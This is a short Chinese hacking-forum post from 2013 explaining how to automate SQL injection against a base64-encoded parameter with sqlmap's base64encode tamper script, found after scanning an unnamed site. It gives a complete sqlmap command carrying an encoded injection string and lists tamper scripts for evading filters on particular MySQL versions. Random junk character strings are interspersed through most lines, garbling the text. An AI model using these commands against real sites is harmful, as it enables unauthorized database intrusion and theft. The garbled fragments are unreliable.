找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2291|回复: 0
打印 上一主题 下一主题

SQlMap Tamper注入Base64编码注入点

[复制链接]
跳转到指定楼层
楼主
发表于 2013-11-23 15:50:45 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?# D$ H! h4 R/ `7 E& e) u& y* i
& l. z3 V$ r3 f; v
sqlmap的tamper里有个base64encode.py
/ g# c4 n6 y9 {! z- i+ O  f" L! S; U$ M. u8 q
使用如下  o& k6 d- W1 X

; }! X; A0 o* I/ f' f, Vsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs' ^3 l( p2 \3 N8 f* w

: z3 {5 p4 F" J: ?4 ^  F) N  @0 B0 A- q3 E. M
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”2 v' u+ I5 n8 A

+ W' |. S1 r9 s) g, P  [其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
& p5 D9 ~7 D$ k& c8 U3 z! J. N/ a8 x
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
# _7 B9 k! e; i7 Pspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入8 {# T# A6 `7 X4 M9 [
首先确定目标数据库版本,然后选择相应的脚本。1 K1 h6 t; _/ C6 y
-v 3 --batch --tamper "space2hash.py"* m- Y) p' H: ?$ v& @! s1 f9 _
; K" y; w5 j& i
还有其他一些插件:8 L0 u* N4 x( j0 @
encodes编码 ——charencode.py6 T3 W% I( U9 ]1 {& l
base64编码 —— base64encode.py
1 E. ^) ~# a$ g' v替换空格和关键字 —— halfversionedmorekeywords.py
+ n( \& n" g% L, M

3 s; p; {& q6 @( f7 i2 V9 T
: P5 A( K, ^/ |7 a6 K4 [' j
* P- c3 A% h& N. C$ h- b
/ A5 p8 v- V/ ]0 v3 H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表